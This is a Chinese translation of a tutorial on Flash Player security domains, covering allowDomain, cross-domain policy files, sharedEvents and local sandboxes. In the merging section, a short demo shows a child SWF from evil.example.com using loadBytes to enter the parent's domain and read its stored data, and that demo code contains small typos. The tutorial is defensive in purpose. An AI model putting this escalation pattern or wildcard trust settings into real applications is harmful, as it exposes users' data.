今天終于有時間把 senocular 上關于安全域和應用程序域的教程好好看了一遍。覺得人家老外就是專業:內容非常有條理且完整,圖文并茂,舉例也非常實用,真是教程中的精品。剛好我最近也在整理這方面的知識,于是決定把這篇翻譯出來,方便國內的讀者。對想要進階理解Flash的運行機制的朋友,本文是不可多得的好材料。
原文地址: http://www.senocular.com/flash/tutorials/contentdomains/
簡介
如果你還沒有與復雜的的安全域(security domain)和應用程序域(application domain)問題打過交道,那么你真是個幸運的家伙。當你在加載外部內容(然后他們開始播放)的時候,默認的設置工作的很好,你甚至不知道他們的存在。
但是某些時候你可能需要控制默認設置以外的更多行為和功能,這樣你就會遇到前面所說的問題。你也許會困擾于Security.allowDomain和crossdomain.xml文件的區別,又或者你想要深究關于安全性的最佳實踐。如果是這樣,那么這篇文章就是你所需要的了。
以下的教程將會討論什么是安全域和應用程序域,以及他們在Flash Player中應該如何使用。
安全域
- Introduction 簡介
- Sandboxing 沙箱
- Security Domains 安全域
- Trust 信任授權
- Non-executable Trust 不可執行文件的信任機制
- Non-executable Content Without Trust 非受信的不可執行文件
- SWF Communication Without Trust 在非受信的SWF之間通訊
- Merging Security Domains 合并安全域
- Stage Owner and Access 場景的擁有者和獲取權限
- Local Security Domains 本地安全域
Sandboxing 沙箱
沙箱是用于區分不同的數據和程序執行。沙箱對于安全性尤其重要。如果沒有恰當的信任授權,兩個位于不同沙箱內的內容應該沒有任何交互。Flash Player的安全模型使用稱為
安全域
的沙箱來分離內容。
雖然安全性是沙箱的主要用途,但這并不是唯一使用沙箱的原因。另外一種可能的情形是使用沙箱來避免命名沖突,這種區分代碼的沙箱方式在Flash Player中被稱為
應用域
。
Security Domains 安全域
安全域在Flash中是頂級的沙箱。安全域鏈接到內容的來源域名,或者是被加載的內容(如SWF文件)的來源域名。比如在senocular.com下的SWF文件包含一個鏈接到senocular.com的安全域,而在example.com下的SWF文件則有一個鏈接到example.com的安全域。不同的安全域使得SWF文件在Flash Player中播放時運行在自身的沙箱下。
Flash Player中的安全域沙箱
注意:在本教程的例子中,你將看到我用統一頂級域名下的不同子域來代表不同域名,這是因為在Flash中,不同子域和不同頂級域一樣,都被視為不同的域。示例中代碼也被簡化過了,在Flash編輯環境下用時間線代碼也可以進行測試。
不可執行的內容(非SWF文件),比如圖片或者文本文件,也被劃分到安全域中,同樣與他們所處的域名相關聯。實際上,正是域名決定了這些內容是否能夠被某個SWF文件加載。更多這方面的內容將在 不可執行文件的信任機制 章節中進行討論。
回到SWF上來,安全域劃分了數據和可執行代碼。如果兩個SWF處于不同的安全域下,某個SWF中的數據(比如某個變量)是不可以被其他SWF獲取的,當然,代碼也不能執行。如果嘗試獲取其他域中SWF文件的數據將會產生一個安全錯誤。
下面的代碼展示了一個SWF文件企圖加載另外一個SWF,并獲取其文檔類的實例(也就是主時間線)。
http://same.example.com/parent.swf:
var
loader:Loader =
new
Loader
(
)
;
loader.
contentLoaderInfo
.
addEventListener
(
Event.
INIT
, init
)
;
var
url
:
String
=
"http://diff.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
function
init
(
event:Event
)
:
void
{
trace
(
loader.
content
)
;
// SecurityError: Error #2121: Security sandbox violation:
// Loader.content: http://same.example.com/parent.swf
// cannot access http://diff.example.com/child.swf.
// This may be worked around by calling Security.allowDomain.
}
任意想要獲取被加載的SWF文件的內容的嘗試,甚至包括trace Loader的content屬性。都會引起安全錯誤,因為他們兩者處于不同的安全域內。
安全域的劃分也適用于Flash Player所使用的原生ActionScript類。Flash Player在每個安全域中都創建了獨立的原生類。舉例來說,一個安全域內的XML類與另外一個安全域內的XML類是不相同的,改變其中一個XML的靜態屬性XML.prettyIndent并不會影響到另一個安全域。
下面這個SWF文件加載了兩個子SWF,一個來自自身的域,另一個從另外的域加載。我們改變了主文件的prettyIndent屬性,來看看這兩個子文件的屬性輸出。
http://same.example.com/parent.swf:
trace
(
XML
.
prettyIndent
)
;
// 2
XML
.
prettyIndent
=
5
;
trace
(
XML
.
prettyIndent
)
;
// 5
// Same domain:
var
sameLoader:Loader =
new
Loader
(
)
;
var
sameURL:
String
=
"http://same.example.com/child.swf"
;
sameLoader.
load
(
new
URLRequest
(
sameURL
)
)
;
// Different domain:
var
diffLoader:Loader =
new
Loader
(
)
;
var
diffURL:
String
=
"http://diff.example.com/child.swf"
;
diffLoader.
load
(
new
URLRequest
(
diffURL
)
)
;
http://same.example.com/child.swf:
trace
(
"same: "
+
XML
.
prettyIndent
)
;
// same: 5
http://diff.example.com/child.swf:
trace
(
"diff: "
+
XML
.
prettyIndent
)
;
// diff: 2
可以看到,第二個子文件的屬性并沒有被改變。這就說明不同的安全域具有不同的原生ActionScript類定義。
Trust 信任授權
盡管安全域只允許相同域下的通訊,但是我們可以通過信任授權來讓處于兩個不同安全域內的SWF文件進行通訊。通過授權,某個安全域內的文件可以獲取另一個域內文件的的數據,或者調用其方法,就像是處于相同的安全域下一樣。
在ActionScript中,SWF的信任授權是通過 Security.allowDomain (或者類似的 Security.allowInsecureDomain )來設置的。在被信任的安全域內的代碼可以調用這個方法來授權信任給另一個或者一組在其他安全域內的SWF文件。這種信任是單向的,發起allowDomain的SWF文件不能去訪問被授權信任的文件,除非對方也做了信任授權。
建立信任關系的安全域
在下面的例子中,一個子SWF文件調用allowDomain來允許父SWF的訪問:
http://home.example.com/parent.swf:
var
loader:Loader =
new
Loader
(
)
;
loader.
contentLoaderInfo
.
addEventListener
(
Event.
INIT
, init
)
;
var
url
:
String
=
"http://away.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
function
init
(
event:Event
)
:
void
{
// (子文件執行了allowDomain)
trace
(
loader.
content
)
; <em>
// [object DocumentClass]</em>
}
http://away.example.com/child.swf:
Security.
allowDomain
(
"home.example.com"
)
;
如果沒有授信,就像前文說到的,還是會引發安全錯誤。但是一旦被加載的子SWF調用了allowDomain以后,父SWF文件就可以自由的訪問子SWF文件中的內容。要注意的是在這個例子中,由于父SWF文件沒有授權away.example.com的信任,所以子SWF仍然無法訪問loader的content屬性。
信任是非常重要的安全概念,絕對不能掉以輕心。我們經常看見使用通配符的授權:
// 小心哦!
Security.
allowDomain
(
"*"
)
;
這么做將允許所有SWF文件,不僅僅只是你加載的或是加載你的,可以通過ActionScript來訪問你文件中的數據。就算你沒有在文件中包含敏感數據,但是如果你在文件中提供了某些方法去獲取這種數據,那也有可能被其他SWF調用。使用allowDomain來授權的信任就像給了其他SWF文件相等的權利:你能做什么,我就能做什么。在接下來的 合并安全域 章節中你將看到這意味著什么。
如果你只是想讓SWF之間能夠通信,除了信任授權的方法以外我們還可以使用sharedEvents對象來實現,我們將在 在非受信的SWF之間通訊 章節中討論。
Non-executable Trust 不可執行文件的信任機制
由于不可執行文件(也就是非SWF文件)不能調用allowDomain代碼,所以這類文件的信任機制在Flash Player中有不一樣的處理方法。這就是跨域(cross-domain)策略文件派上用場的地方。
跨域策略文件是一個放在網站的根域名下的命名為crossdomain.xml的XML文件。和allowDomain類似,定義了一組可以被Flash Player加載的安全網站域名。一個簡單的跨域策略文件的例子如下:
http://example.com/crossdomain.xml:
<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.example.com"/>
<allow-access-from domain="www.example-partner.com"/>
</cross-domain-policy>
你可以從 Cross-domain policy file specification (adobe.com)獲得詳細的文件格式信息。
和allowDomain不同的是,跨域策略文件只提供了包含所有文件(通常是一個域下的所有文件)的用法。上面的例子表示允許來自example.com的任意子域或www.example-partner.com的SWF文件加載example.com下的文件。
由于存在allowDomain機制,跨域策略文件通常不用于授權SWF文件的訪問。跨域加載SWF的時候不會請求跨域策略文件。只有當要把一個跨域的SWF合并到當前的安全域的時候,才需要提供跨域策略文件。這個主題將在 合并安全域 中進行討論。
不管是標準的位于域名根目錄下的跨域策略文件還是用 Security.loadPolicyfile 指定的跨域策略文件,都只有在需要的時候才會被加載:當內容被加載的同時,跨域策略文件也被一起加載進來。
加載完成后,Flash Player分析跨越策略文件并判斷該域是否為信任SWF所處的域。如果答案是肯定的話,文件正常加載,就像處于和SWF文件相同的域一樣。反之則有可能有兩種情況:
- 文件不被加載
- 文件加載成功,但是其數據不能被SWF文件直接訪問
如果文件本身就是數據(文本文件,XML文件,二進制數據等等),那么文件就不會被加載。
需要跨域策略文件來加載僅包含數據的文件
如果文件除了數據以外還有其余用途(圖像文件,聲音文件等),那么文件還是能夠被加載到用戶可見(可聽)的環境中。比如說圖像文件,就算沒有跨域策略文件,還是可以在Loader對象中顯示給用戶看。但是類似BitmapData.draw等直接訪問圖像數據的方法就不能運行。
需要跨域策略文件來獲取其他文件的數據的引用
對此可能大家都有點疑惑。實際上用戶是可以訪問這些數據的,但是SWF文件不行。Flash Player是在保護用戶的數據不被潛藏有危險代碼的SWF文件獲取。用戶不需要關心跨域策略文件也能正常的瀏覽網頁內容。
但這并不是說跨域策略文件可以被忽視,類似于下面這種過分縱容的跨域策略文件有很多潛在的危險:
<?xml version="1.0"?>
<cross-domain-policy>
<!--
小心哦!
-->
<allow-access-from domain="*"/>
</cross-domain-policy>
警告 :使用通配符(*)允許所有域的訪問等同于: 用戶可能可以接觸到的所有處于該域下的數據都有可能被任意SWF文件獲取 。
客戶端的Flash Player運行在當前用戶的認證下,這就表示用戶的數據可能就是Flash Player的數據。而且Flash Player的數據可能被任意在里面運行的SWF獲取。Flash Player默認只允許相同域名下的SWF的安全數據,并限制跨域SWF的運行。如果沒有這層限制,SWF可以獲取任意當前用戶可以獲取的數據。
舉個例子:某用戶使用他的認證來登錄網頁的郵件客戶端收取郵件,然后用戶打開了一個包含有惡意程序的SWF的頁面。如果沒有跨域限制的話,這個SWF可以用他現有的認證偷偷地加載用戶的郵件頁面。用戶可以訪問的內網也不例外,只要用戶能去的地方,SWF就能去。幸好Flash Player阻止了這種獲取數據的行為,除非該域通過跨域策略文件給予SWF授權。
記住一個原則,永遠不要對包含敏感數據的域開發跨域授權,即使需要上面的信息來進行用戶認證。把SWF可以訪問的數據劃分到不同的域或者子域下面。
Domain Description Policy file| login.example.com | Hosts user data | None |
| feed.example.com | Hosts public data |
Includes:
<allow-access-from domain="*" />
|
這將使得敏感數據不可被訪問,但是仍然可以對其他域下的SWF文件公開你的其他數據。
Non-executable Content Without Trust 非受信的不可執行文件
如果沒有跨域策略文件的信任授權,Flash Player禁止非SWF文件的獲取。特別是像文本那樣的僅包含數據的文件,甚至不會加載。如果你需要從一個沒有跨域授權的域中獲取數據,還是有一個變通的辦法。
跨域策略文件用于保護數據,特別是保護用戶數據,或者說是用戶能夠接觸到的數據。因為Flash Player是運行在客戶端的,但是服務器端的代碼沒有這種限制。服務器完全是另外一臺機器,所以用戶請求和服務器請求是完全無關的。
由于服務器沒有用戶的限制,服務器端的代碼可以從任意公開的網絡服務獲取數據。也就是說包含SWF的服務器可以用于訪問外部域的數據,然后作為相同域的數據返回給Flash Player。由于處在相同的域下,Flash Player就不需要有跨域策略文件了。
下面的代碼演示了一個服務器端的php腳本加載外部數據的例子:
http://home.example.com/loader.swf:
var
urlLoader:URLLoader =
new
URLLoader
(
)
;
var
urlVariables:URLVariables =
new
URLVariables
(
)
;
// 服務器端獲取外部數據的地址
urlVariables.
externalURL
=
"http://away.example.com/content.txt"
;
// 服務器端的腳本獲取外部數據并傳給SWF
var
serverPage:
String
=
"http://home.example.com/read.php"
;
var
request:URLRequest =
new
URLRequest
(
serverPage
)
;
request.
data
= urlVariables;
urlLoader.
load
(
request
)
;
這種解決方案也有一定的問題。首先你必須能夠在服務器端部署代碼,某些小項目也許根本不需要服務器環境。
另一個可能更重要的原因是這種方式加倍了網絡流量。首先必須從外部域加載到你自己的域下,然后才被下載到你的SWF客戶端。同時這也加重了你的服務器的負載。使用跨域策略文件的話就不會有這種問題。
這可以作為一種解決方案,但最好還是能用跨域策略文件來解決。
SWF Communication Without Trust 在非受信的SWF之間通訊
在某些情況下有可能要與其他來源不那么可靠的域中的SWF通訊,你并不希望完全信任該域,放開全部授權。對此LoaderInfo對象的sharedEvents屬性提供了另一種機制。sharedEvents對象是唯一的一個可以在不同安全域中發送共享事件的對象。加載者和被加載者都可以通過這個對象來向對方發送事件。
通過sharedEvents對象發送的事件在兩個域中都是完全受信的,這就使得在兩個安全域中傳遞的任意數據都無需考慮安全問題。
警告 :當心!通過sharedEvents對象傳遞了錯誤的數據仍然有可能把你的SWF中的數據暴露出去。比如你的事件包含了一個復雜對象,特別是顯示列表上的對象,那么你的整個SWF都將暴露。
所以通過sharedEvents發送的事件應該限制為包含簡單數據的事件類型,避免一些被包含后門的SWF程序加以利用。如果你要傳遞復雜的事件,那要在傳遞之前先做一下清理。
使用sharedEvents進行通訊的兩個SWF需要確保發送和接收的是一致的事件類型。父SWF可以發出一種事件并監聽另一種。子SWF可以監聽父SWF發出的事件并發出父SWF中正在監聽的事件。這些事件的名字可以是隨意的。
下面的例子演示了在不同安全域中的父子SWF使用sharedEvents來通訊簡單的文本信息的情況。父SWF發出“fromParent”事件,而子SWF發出“fromChild”事件。
http://safe.example.com/parent.swf:
var
loader:Loader =
new
Loader
(
)
;
var
shared:EventDispatcher = loader.
contentLoaderInfo
.
sharedEvents
;
shared.
addEventListener
(
"fromChild"
, fromChild
)
;
var
url
:
String
=
"http://untrusted.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
function
fromChild
(
event:TextEvent
)
:
void
{
trace
(
event.
text
)
;
// Good day
var
replyMessage:TextEvent =
new
TextEvent
(
"fromParent"
)
;
replyMessage.
text
=
"Same to you"
;
shared.
dispatchEvent
(
replyMessage
)
;
}
http://untrusted.example.com/child.swf:
var
shared:EventDispatcher = loaderInfo.
sharedEvents
;
shared.
addEventListener
(
"fromParent"
, fromParent
)
;
var
firstMessage:TextEvent =
new
TextEvent
(
"fromChild"
)
;
firstMessage.
text
=
"Good Day"
;
shared.
dispatchEvent
(
firstMessage
)
;
function
fromParent
(
event:TextEvent
)
:
void
{
trace
(
event.
text
)
;
// Same to you
}
任意的事件類都可以像這樣用于傳遞信息,也包括自定義事件。再次強調,要當心不要把包含引用的數據(特別是顯示列表上的對象)隨著事件一起發送出去。這種情況的例子在 場景的擁有者和獲取權限 章節中可以找到。
Merging Security Domains 合并安全域
如果兩個域之間建立了信任關系,一個SWF就能把另外一個SWF加到自己的安全域內,就像是在相同的域下一樣。
在這種情況下信任授權的處理有少許不同。首先,包含父SWF的域不需要指定什么,只要執行加載另一個SWF到當前的安全域就表示完全信任這個SWF。
其次,因為子SWF是立即被加載到父SWF的安全域中,并沒有機會通過allowDomain進行信任授權聲明。當子SWF可以執行allowDomain聲明的時候,已經被加載并實例化到另外的域中。所以這種情況下,跨域策略文件將派上用場。實際上這也是跨域策略文件唯一適用于對SWF進行授權的情況。
需要跨域策略文件把跨域的SWF加載到相同的安全域
要加載某個SWF到自己的安全域內,需要給Loader.load方法指定一個 LoaderContext 對象。LoaderContext對象的securityDomain屬性設置為當前的安全域( SecurityDomain.currentDomain )。通過這樣的加載方式,父SWF授信給子SWF,而子SWF的授信則需要通過跨域策略文件。
http://host.example.com/parent.swf:
trace
(
new
LocalConnection
(
)
.
domain
)
;
// host.example.com
var
loader:Loader =
new
Loader
(
)
;
// 創建一個LoaderContext對象把子SWF加載到當前的安全域
var
context:LoaderContext =
new
LoaderContext
(
true
)
;
context.
securityDomain
= SecurityDomain.
currentDomain
;
var
url
:
String
=
"http://trusting.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
, context
)
;
http://trusting.example.com/crossdomain.xml:
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="host.example.com"/>
</cross-domain-policy>
http://trusting.example.com/child.swf:
trace
(
new
LocalConnection
(
)
.
domain
)
;
// host.example.com
我們可以通過 LocalConnection 對象的domain屬性來檢查每個SWF所處的安全域。雖然子SWF原先所處的域是trusting.example.com,但是由于它被加載到父SWF所處的域中,所以子SWF最終所處的安全域是host.example.com。
用這個方式加載的SWF文件權力比用allowDomain授權的更加大。使用allowDomain授權,等同于 說你能做什么,我就能做什么 。而把SWF加載到同一個安全域,則等同于 我能做任何事 。在前一種情況下,子SWF只能調用父SWF下的代碼,還是受限于父SWF中的定義。但是通過加載到相同的安全域,這些子SWF就可以在你的域下面做任意操作,這包括:
- 獲取父SWF中的任意引用
- 讀取主域中的所有文件
- 讀取其他授信給主域的所有域下的文件
- 讀取主域下的共享對象
- 獲取通過主域建立的共享連接通訊
- 獲取授信給主域的socket連接
所以在引入跨域SWF文件到你當前的安全域下的時候,你要確保這種權力不會被濫用。
使用包含安全域的LoaderContext對象的load方法不是能夠引入跨域SWF到你的安全域的唯一方法。Loader類的另一個方法loadBytes也可以做到。和load不同的是,它不是用URL來加載外部內容,而是直接加載以 ByteArray 的形式加載對象。
由于ByteArray與域名之間沒有關聯,所以用loadBytes方法加載的對象將直接進入當前安全域內。因為你在加載包含這些字節對象之前往往都要經過某種信任授權,所以這通常是安全的。
http://host.example.com/parent.swf:
trace
(
new
LocalConnection
(
)
.
domain
)
;
// host.example.com
var
loader:Loader =
new
Loader
(
)
;
var
urlLoader:URLLoader =
new
URLLoader
(
)
;
urlLoader.
dataFormat
= URLLoaderDataFormat.
BINARY
;
urlLoader.
addEventListener
(
Event.
COMPLETE
,
bytesLoaded
)
;
// cross-domain policy file required to load data
var
url
:
String
=
"http://trusting.example.com/childbytes.swf"
;
urlLoader.
load
(
new
URLRequest
(
url
)
)
;
function
bytesLoaded
(
event:Event
)
:
void
{
loader.
loadBytes
(
urlLoader.
data
)
;
}
http://trusting.example.com/crossdomain.xml:
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="host.example.com"/>
</cross-domain-policy>
http://trusting.example.com/childbytes.swf:
trace
(
new
LocalConnection
(
)
.
domain
)
;
// host.example.com
就和前面看到的例子一樣,通過檢查子SWF文件的LocalConnection.domain屬性,使用loadBytes方法加載的子SWF也顯示為相同的安全域。
警告 :loadBytes方法有個小小的安全問題:可以把授信過的跨域SWF和加載到當前安全域下的SWF兩者間的不同扯平。我們知道雖然這兩者都是被信任的,但是就像上面的列表中提到的,后者比前者的權力更大。“ 你能做什么,我就能做什么 ”與“ 我能做任何事 ”之間的差別,結果可以變成沒有差別。
這是因為授信過的跨域SWF文件可以訪問父SWF的任何對象,包括父SWF對象的Loader實例,一旦擁有了對loadBytes方法的引用,這就意味著可以把某些字節對象加載到當前的安全域。
下面的這個例子展示了這種可能性:
http://good.example.com/parent.swf:
// 授權 "你能做什么,我就能做什么"
Security.
allowDomain
(
"evil.example.com"
)
;
// 應當受保護的數據
var
so:
SharedObject
=
SharedObject
.
getLocal
(
"foo"
,
"/"
)
;
so.
data
.
foo
=
"bar"
;
so.
flush
(
)
;
var
loader:Loader =
new
Loader
(
)
;
var
url
:
String
=
"http://evil.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
http://evil.example.com/child.swf:
var
so:
SharedObject
=
SharedObject
.
getLocal
(
"foo"
,
"/"
)
;
trace
(
"trust only: "
+ so.
data
.
foo
)
;
// trust only: undefined
var
urlLoader:URLLoader =
new
URLLoader
(
)
;
urlLoader.
dataFormat
= URLLoaderDataFormat.
BINARY
;
urlLoader.
addEventListener
(
Event.
COMPLETE
,
bytesLoaded
)
;
var
url
:
String
=
"http://evil.example.com/childbytes.swf"
;
urlLoader.
load
(
new
URLRequest
(
url
)
)
;
function
bytesLoadedEvent
)
:
void
{
// 威脅!loadBytes加載了SWF數據到父SWF的安全域
loaderInfo.
loader
.
loadBytes
(
urlLoader.
data
)
;
}
http://evil.example.com/childbytes.swf:
var
so:
SharedObject
=
SharedObject
.
getLocal
(
"foo"
,
"/"
)
;
trace
(
"same domain: "
+ so.
data
.
foo
)
;
// same domain: ba
將來版本的Flash Player可能會改變這種行為,所以在程序中不要使用這種方法。我們應該關注的是加載授信過的SWF文件會帶來的潛在威脅:暴露你的域下的所有數據。
Stage Owner and Access 場景的擁有者和獲取權限
當第一個SWF文件被加載到Flash Player中的時候,它被加到顯示列表的根上,也就是我們所說的 stage 對象。這也是Flash Player自己的顯示對象的根。每個SWF都有代表自己主文檔類或者主時間線的根(叫做 root )。第一個被創建的SWF實例的根被放置于場景上,其他子SWF使用Loader對象的實例來加載。
場景的特別之處在于它本身就位于顯示列表上,所有處于顯示列表上的子SWF都可以取得它的引用,但是它只有一個擁有者:就是第一個被實例化的那個SWF。場景的擁有者決定了場景所連接的安全域。其他的SWF想對場景進行特殊操作的行為都必須獲得場景所有者的信任授權。
你可能有注意到在過去的有些程序或者是組件中,被加載到不同的域(未授信)里的時候報錯。這正是因為沒有取得對場景對象進行操作的授權。因為場景對象是可以被引用的,但是諸如場景的addEventListener方法等卻不可用,所以這很容易引起誤解。
下面這個表格列出了場景對象限制非安全域對象訪問的成員。可能不是100%精確,主要用于參考。
| addChild | addChildAt | removeChild |
| removeChildAt | getChildIndex | setChildIndex |
| getChildAt | getObjectsUnderPoint | swapChildren |
| swapChildrenAt | numChildren | tabChildren |
| mouseChildren | width | stageWidth |
| fullScreenWidth | height | stageHeight |
| fullScreenHeight | quality | align |
| scaleMode | displayState | fullScreenSourceRect |
| stageFocusRect | showDefaultContextMenu | colorCorrection |
| addEventListener | dispatchEvent | hasEventListener |
| willTrigger |
在下面的例子中看看場景是如何可以被子SWF訪問,但是卻不能調用stage.addEventListener方法。
http://first.example.com/parent.swf:
var
loader:Loader =
new
Loader
(
)
;
addChild
(
loader
)
;
var
url
:
String
=
"http://<samp>second</samp>.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
http://second.example.com/child.swf:
// Works
trace
(
stage
)
;
// [object Stage]
// Does not work
stage
.
addEventListener
(
MouseEvent.
CLICK
, stageClick
)
;
// SecurityError: Error #2070: Security sandbox violation:
// caller http://second.example.com/child.swf cannot access
// Stage owned by http://first.example.com/parent.swf.
場景的這種所有者關系非常操蛋,因為我們經常需要對場景對象監聽鼠標或者鍵盤事件,比如檢測鍵盤按下或者檢測鼠標在物體外部釋放點擊。在這種情況下,單靠子SWF自身是沒辦法完成的。還好,場景擁有者的父SWF可以通過sharedEvents傳遞場景事件而不必授信給子SWF。通過這種方式,可以在保護主域的前提下配合完成這種工作。
警告 :以下這個使用范例演示了sharedEvents是如何處理安全性問題的。一些鼠標事件的relatedObject屬性持有對時間線上的對象的引用。如果不經過清理,這些對象就會暴露給沒有經過授信的域。所以通過sharedEvents發送事件時,要把這些引用清除。比如MouseEvent,我們可以新建一個僅包含必須數據的MouseEvent對象。
下面的示例展示了如何通過sahredEvents發送場景事件。示例中僅僅轉發了MOUSE_OUT事件,當然也可以擴展于其他的事件類型。注意如何創建一個代理事件并保護父SWF中的對象。
http://stageowner.example.com/parent.swf:
var
combination:
String
=
"1-2-3-4-5"
;
// 隱私數據
var
loader:Loader =
new
Loader
(
)
;
var
shared:EventDispatcher = loader.
contentLoaderInfo
.
sharedEvents
;
var
url
:
String
=
"http://untrusted.example.com/child.swf"
;
loader.
load
(
new
URLRequest
(
url
)
)
;
stage
.
addEventListener
(
MouseEvent.
MOUSE_OUT
, forwardMouseEvent
)
;
function
forwardMouseEvent
(
event:MouseEvent
)
:
void
{
// 威脅!這種做法暴露了relatedObject,也使得其他數據被暴露
//shared.dispatchEvent(event);
// Safer: 創建一個清理過的代理事件來切斷relatedObject的引用
var
safeEvent:MouseEvent =
new
MouseEvent
(
event.
type
)
;
safeEvent.
altKey
= event.
altKey
;
safeEvent.
buttonDown
= event.
buttonDown
;
safeEvent.
ctrlKey
= event.
ctrlKey
;
safeEvent.
delta
= event.
delta
;
safeEvent.
localX
= event.
localX
;
safeEvent.
localY
= event.
localY
;
safeEvent.
shiftKey
= event.
shiftKey
;
shared.
dispatchEvent
(
safeEvent
)
;
}
http://untrusted.example.com/child.swf:
var
shared:EventDispatcher;
// 如果場景事件不能引用,那就通過sharedEvents監聽
if
(
loaderInfo.
parentAllowsChild
)
{
stage
.
addEventListener
(
MouseEvent.
MOUSE_OUT
, stageMouseOut
)
;
}
else
{
shared = loaderInfo.
sharedEvents
;
shared.
addEventListener
(
MouseEvent.
MOUSE_OUT
, stageMouseOut
)
;
}
function
stageMouseOut
(
event:MouseEvent
)
:
void
{
// -- stage mouse out actions here --
// 如果sharedEvents傳遞了原始的鼠標事件,那么父域中的數據就暴露了!
//trace(Object(event.relatedObject).root.combination); // 1-2-3-4-5
}
幸好有safeEvent這個MouseEvent的實例,原本的MouseEvent對象的relatedObject指向的引用被屏蔽了。實際上,所有通過sharedEvents對象發送的事件都應該用這種方式清理一遍。
Local Security Domains 本地安全域
在硬盤上運行的SWF文件同樣有自己的安全域。本地安全域有自己獨特的行為,共分為4種安全沙箱類型:local-with-file, local-with-network, local-trusted, and application for AIR(本文不詳細討論AIR)。再加上網絡上的SWF,一共有5種安全沙箱。在ActionScript中,你可以用 Security.sandboxType 來獲得當前的安全沙箱類型。
-
local-with-file
(
Security.LOCAL_WITH_FILE)—本地不受信任的文件,只可以訪問本地數據,不能與網絡通信。 -
local-with-network
(
Security.LOCAL_WITH_NETWORK)—本地不受信任的文件,只可以訪問網絡,但是不能讀取本地數據。 -
local-trusted
(
Security.LOCAL_TRUSTED)—本地受信的文件,通過Flash Player設置管理器或者FlashPlayerTrust文件授權。可以訪問本地和網絡。 -
application
(
Security.APPLICATION)—隨著AIR包而安裝,運行在AIR程序中。默認在這種沙箱類型下的文件可以調用任意域下的文件(外部域可能不允許)。而且默認能從任意其他域下加載數據。 -
remote
(
Security.REMOTE)—來自網絡的文件,遵循安全域的沙箱規則。
由于有可能從用戶的硬盤上獲取敏感數據,所以本地文件在安全方面有著嚴格的規則。一旦有機會,惡意的SWF將可以從電腦上讀取數據并上傳到網絡上的服務器。所以為了防止這種情況,本地的SWF只允許一種類型的通訊,要么就是本地,要么就是網絡。而且,不同安全沙箱類型的SWF不能相互加載,避免能同時訪問網絡和訪問本地的情況出現。
由于我們不能判斷本地文件的域名,所以判斷本地SWF文件的安全沙箱用的是另外一種形式。只允許本地和只允許網絡這兩種情況是通過SWF文件內的標識來區分的,所有的SWF在發布的時候都帶有這種標識,當SWF在本地運行的時候,Flash Player就用它來檢測安全沙箱類型。
對于本地的信任文件,相同的問題是我們沒有地方來保存跨域策略文件,所以我們通過Flash Player的 設置管理器 里的 全局安全設置面板 來設置。通過下圖中所示的下拉菜單把本地SWF的路徑添加到本地的安全文件列表里。
Flash Player 設置管理器
另一種方式是通過配置文件的方式。配置文件不像設置管理器那樣需要聯網來使用。要把SWF或者包含SWF的文件夾添加到信任位置的話只需要添加路徑到Flash Player的#Security\FlashPlayerTrust下的.cfg文件就可以了。在Mac和Windows上,這個路徑如下:
- Windows 95-XP:
C:\Documents and Settings\ [username] \Application Data\Macromedia\Flash Player\#Security\FlashPlayerTrust- Windows Vista-7:
C:\Users\ [username] \AppData\Roaming\Macromedia\Flash Player\#Security\FlashPlayerTrust- Mac OS X:
/Users/ [username] /Library/Preferences/Macromedia/Flash Player/#Security/FlashPlayerTrust
把 [username] 替換為你的用戶名。
兩種方法都是把信任授權信息寫入你的硬盤(全局安全設置面板也一樣,保存在Flash Player的特定目錄下)。這些文件就像你本地的跨域策略文件一樣。當Flash Player讀取的時候,信任授權給SWF,并覆蓋SWF文件中關于本地訪問權限的標識,從而允許受信的SWF能夠同時訪問本地和網絡。
本地安全域
關于本地信任機制還有一點需要注意的是即使是本地受信的文件,仍然不能把處于外部沙箱的內容加載入本地沙箱。
大多數Flash內容都是為網絡創建的,所以通常不需要完全理解本地的安全沙箱機制。但是開發和測試是一個例外。Flash編輯器在測試的時候就是把SWF放在一個本地受信的安全沙箱里面。這有可能會造成與真正發布的SWF情況不同的結果,因為兩者的安全沙箱不同。比如你測試的時候可以從沒有授信的外部域讀取內容,而真正發布到網站上的SWF卻無法加載。所以當你測試的時候要注意,你所看到的結果和最終發布的版本有可能不一樣。
你可以到 Flash Player Developer Center (adobe.com)的 Security section 查看更詳細的安全相關信息。
第一部分到此結束,第二部分Application Domain請 點擊 。
更多文章、技術交流、商務合作、聯系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元
